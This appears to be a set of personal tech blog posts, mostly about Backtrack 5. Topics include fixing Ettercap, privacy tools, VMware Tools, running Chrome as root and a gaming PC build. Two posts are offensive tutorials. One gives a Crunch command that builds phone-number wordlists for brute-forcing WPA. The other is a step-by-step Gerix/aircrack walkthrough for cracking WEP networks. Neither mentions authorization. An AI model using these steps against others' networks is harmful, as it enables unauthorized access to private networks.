Ettercap Host Scan lockup Fix

This is a quick fix I ran across trying to fix Ettercap.  Ettercap comes installed by default on Backtrack5 R2. By default, it also tends not to work and crashes after you launch the Host Scan.

This is the source of the solution http://www.backtrack-linux.org/forums/showthread.php?t=40562 to give credit.

First you’ll need to remove the current version of Ettercap by typing apt-get remove ettercap

Next download these builds of ettercap.

For BT5 32bit go to: https://launchpad.net/~timothy-redae…+build/1758139
For BT5 64bit go to: https://launchpad.net/~timothy-redae…+build/1758138

Download the 3 built .deb files and install them using dpkg -i ettercap-common_0.7.3-1.4ubuntu1drizzt1_i386.deb ettercap-gtk_0.7.3-1.4ubuntu1drizzt1_i386.deb ettercap_0.7.3-1.4ubuntu1drizzt1_i386.deb 

Ettercap should now be available in the Backtrack menu under Applications > Internet > ettercap

This will prevent ettercap from crashing after the host scan.

Advertisements

Privacy Tools

The recent post about Microsoft-Skype snooping accusations has prompted some paranoia and raised questions.  Myself included.  In this blog post Microsoft refuses to comment about the ability to listen to VoIP calls in Skype.  New wiretapping laws are forcing some software vendors to install “backdoors” in their software and you can be sure Skype will be the first to do it.  Think of this as a preventative measure instead of paranoia. If you aren’t aware, Skype and other IM services record everything you type to everyone and it’s saved for up to 6 months to a year depending on their data retention policy. Not that you have anything to hide, but law enforcement can subpoena this information from the vendor and use it against you.  This post started off as listing an alternative to Skype, but I added a few privacy tools also.

IM Privacy

First off there’s Jitsi.  Jitsi (previously SIP Communicator) is an audio/video and chat communicator that supports protocols such as SIP, XMPP/Jabber, AIM/ICQ, Windows Live, Yahoo! and many other useful features.

Jitsi also has Skype like features such as Video/VoIP calling. This has been a great up and coming tool and a replacement for Skype.

Another suggestion is Pidgin.  Pidgin is a universal messenger for almost every IM client. More importantly, it supports a Plug-in called OTR or Off-The-Record. When OTR is enabled on both ends, the messages are encrypted, and anyone watching (ISP, Hackers) can’t read the messages. You can get it here.

SILC – Secure Internet Live Conferencing, or SILC in short, is a modern conferencing protocol which provides rich conferencing features with high security. One of the main design principles of the protocol was security. Many of the SILC features are found in traditional chat protocols such as IRC but many of the SILC features can also be found in Instant Message (IM) style protocols.

Email 

riseup.net They don’t keep logs, retain identifying information, or record IP addresses. A very secure option unlike gmail, hotmail, etc.

OS

TOR  Go here for a full explanation as I can’t be bothered. This can be installed on Linux/Windows/Mac and is for anonymizing traffic

Tails. The tl;dr version : A bootable Linux distro that routes all traffic through the tor network.

Tails is a live system that aims at preserving your privacy and anonymity. It helps you to use the Internet anonymously almost anywhere you go and on any computer but leave no trace using unless you ask it explicitly.

It is a complete operating-system designed to be used from a DVD or a USB stick independently of the computer’s original operating system. It is Free Software and based on Debian GNU/Linux.

Tails comes with several built-in applications pre-configured with security in mind: web browser, instant messaging client, email client, office suite, image and sound editor, etc

Tails relies on the Tor anonymity network to protect your privacy online: all software are configured to connect through Tor, and direct (non-anonymous) connections are blocked.

Tor is free software and an open network that helps you defend against a form of network surveillance that threatens personal freedom and privacy, confidential business activities and relationships, and state security known as traffic analysis.

Tor protects you by bouncing your communications around a distributed network of relays run by volunteers all around the world: it prevents somebody watching your Internet connection from learning what sites you visit, and it prevents the sites you visit from learning your physical location.

Using Tails on a computer doesn’t alter or depend on the operating system installed on it. So you can use it in the same way on yours, the computer of a friend or one at your local library. After removing your Tails DVD or USB stick the computer can start again on its usual operating system.

VPN

A VPN (Virtual Private Network) Anonymous VPN’s don’t keep logs of people using it or activity and the servers are usually located abroad. No logs means no data to subpoena, and no data means no problems.  Torrentfreak did a good review on which Anonymous VPN’s are really anonymous and which ones actually keep logs and cooperate with law enforcement and can be found here. A vpn would be the best way to keep your internet activity private, but the downside is it costs money. Usually 5-10$ USD a month.  If you are worried about a paper trail, most accept BitCoins or you could use a pre-paid credit card.

Generate 10 Digit Phone Numbers using Crunch in Backtrack

Phone numbers are some of the most commonly used passwords for WEP/WPA encrypted wireless networks. Several ISP’s use them as default passwords for their routers for easy to remember access.  By creating a list of every possible phone number combination with a specific area code, generally your own area code, it will give you quick access to most wireless networks using a dictionary attack. Using crunch built into Backtrack 5R2, you can quickly generate every possible number combination beginning with a specified area code.

Applications > BackTrack > Privilege Escalation > Password Attacks > Offline Attacks > crunch

Use the following command

./crunch 10 10 -t 123%%%%%%% -o /root/123.txt

Explanation of command.  10 refers to the number of characters. The -t command allows you to specify a pattern where only the @’%^ characters will change, in this case the %. The 123 is where the area code will go followed by 7 % characters. The -o is for output and can be saved anywhere. Make sure to save it as a .txt file. This will only take a few seconds and will say 100% when finished. Now you can load these in Gerix and bruteforce WPA.

Note: Most cities have multiple area codes. To combine multiple files into one just do a ‘cat 123.txt 456.txt 789.txt >> all.txt’

WEP Cracking in Backtrack 5 using Gerix

I’m creating several posts at once, and I’ll be adding screen shots shortly, bear with me.

Boot up to Backtrack 5 R2. You’ll need a laptop with a wireless card that supports monitor mode and packet injection.

Applications >BackTrack > Exploitation Tools > Wireless Exploitation Tools > WLAN Exploitation > gerix-wifi-cracker-ng

Note [At the bottom of Gerix, you will see the current actions taking place, so if something goes wrong you can see exactly what it is]

With Gerix open, go to the Configuration Tab.

You should see your interface marked as wlan0. Select it, and click the button below labeled Enable/Disable Monitor Mode.  The card will now be in Monitor mode.

At this point, you can also click the Set random MAC address to spoof your MAC address.

Click on the interface labeled mon0 so it’s highlighted.  Underneath that, you will see a button to Rescan Networks. Click this to search for SSID’s.

Select the desired WEP network SSID.

Click the WEP tab. Click Start Sniffing and Logging. You should see the BSSID MAC loaded as well as the PWR (Signal Strength) and other data.  Keep this window open.

Click Performs a test of injection AP to ensure your card is able to inject packets. You will get a message stating “Injection is working!”. You can close this window.

For this demonstration we will use WEP Attacks (no-client). Click the button labeled as such.

Under Fragmentation attack, click Associate with AP using fake auth. In the bottom data viewer window, you will see it read “Fake authentication with mon0”

Click Fragmentation attack button. Once it finds a packet, it will prompt to “Use this packet ?” Type Y for yes.

Click Create the ARP packet to be injected on the victim access point.

Click Inject the created packet on victim access point. Type Y in this box also.  Keep this window open.

Go to the Cracking tab, and under WEP Cracking, click the Aircrack-ng – Decrypt WEP password button. You will be watching here for the number of IV’s. (got 10,000 IVs)

You will generally need about 10,000 – 20,000 IVs to decrypt the password and sometimes less. This can take 30 seconds to a couple minutes depending on the amount of wireless traffic. You can safely close this window, and click the button again to reopen it when it has enough IV’s.

The key will be displayed in this window when complete.

VMWare Tools Install Ubuntu

With your virtual machine running, in the VMware menu, VM > Install VMware Tools.

Open a terminal in the virtual machine and do the following

# mkdir /mnt/cdrom; mount /dev/cdrom  /mnt/cdrom
# cp /mnt/cdrom/VMwareTools-<version>.tar.gz /tmp/
# cd /tmp/
# tar zxpf VMwareTools-<version>.tar.gz 
# cd vmware-tools-distrib/
# ./vmware-install.pl 
Accept default settings if you are unsure.

This should work on most VM's.

Run Google Chrome as root

In Backtrack , you are automatically defaulted to the root user.  If you try to install Google Chrome and run it you get an error like this

Open a terminal and do the following

# gedit /usr/bin/google-chrome

This will open up gedit. Scroll to the very bottom of the script.

The last line will look like

exec -a “$0”  “$HERE/chrome”  “$@”

Add the following to the end, with a space after the ”

–user-data-dir

The resulting line should look as follows

exec -a “$0”  “$HERE/chrome”  “$@” –user-data-dir

Save and close.

Google Chrome will launch as root.

Gaming Rig

Went all out on this one.

  • CoolerMaster HAF 922
  • ASUS Sabertooth X79 LGA 2011 Intel X79 SATA 6Gb/s USB 3.0
  • Intel Core i7-3820 Sandy Bridge-E 3.6GHz (3.8GHz Turbo Boost) LGA 2011
  • CORSAIR Vengeance 16GB (4 x 4GB) DDR3 SDRAM DDR3 1866
  • CORSAIR Professional Series HX750W Power Supply
  • CORSAIR H100 Extreme Performance Liquid CPU Cooler
  • XFX Radeon HD 6870 2GB 256-bit GDDR5 PCI Express 2.1 x16
  • WD Caviar Black 1TB 7200 RPM 64MB Cache SATA 6.0Gb/s
  • Asus VE248 24″ Monitor

boxes of fun

Haf 922 stripped

Sabertooth x79

Incorrect fan/radiator positioning.

The image above, shows the original “pull” method I had for the Corsair H100 cooler. Due to the large heatsink on the top of the board, the fan would not fit. Putting the fans in a “push” setup, with the fans on top of the radiator blowing air downwards, was the solution. The fans are 120x120x25, so there is no room for a push/pull setup in this Haf 922 case. I have some thinner fans (120x120x12mm) that I plan to install to utilize the push/pull method.

Messy

Almost done

Runs like a champ. Plays Crysis, Skyrim, Battleield 3, etc on full 1920×1080 resolution and full graphics. Surprising for a 6870 2GB card running only 200$.

What’s next?

  • Apply Arctic Silver 5 to heatsink
  • Install 2 Scythe 120x120x12mm fans for push/pull
  • Add second Radeon 6870 for Crossfire
  • Add second WD HD for Raid 0 setup

More to come on this post as it progresses. I’ll post some benchmarks from 3DMark and upload some newer pictures soon..

3DMark 11 Basic Edition


Graphics Score
4142

Physics Score
8881

Combined Score
4089

Heaven Benchmark v3.0 Basic

FPS:
42.7
Scores:
1075
Min FPS:
25.0
Max FPS:
79.8

Hardware

Binary:
Windows 32bit Visual C++ 1600 Release Mar 7 2012
Operating system:
Windows 7 (build 7601, Service Pack 1) 64bit
CPU model:
Intel(R) Core(TM) i7-3820 CPU @ 3.60GHz
CPU flags:
3602MHz MMX SSE SSE2 SSE3 SSSE3 SSE41 SSE42 HTT
GPU model:
AMD Radeon HD 6800 Series 8.950.0.0 2048Mb

Settings

Render:
direct3d11
Mode:
1920×1080 8xAA fullscreen
Shaders:
high
Textures:
high
Filter:
trilinear
Anisotropy:
4x
Occlusion:
enabled
Refraction:
enabled
Volumetric:
enabled
Tessellation: disabled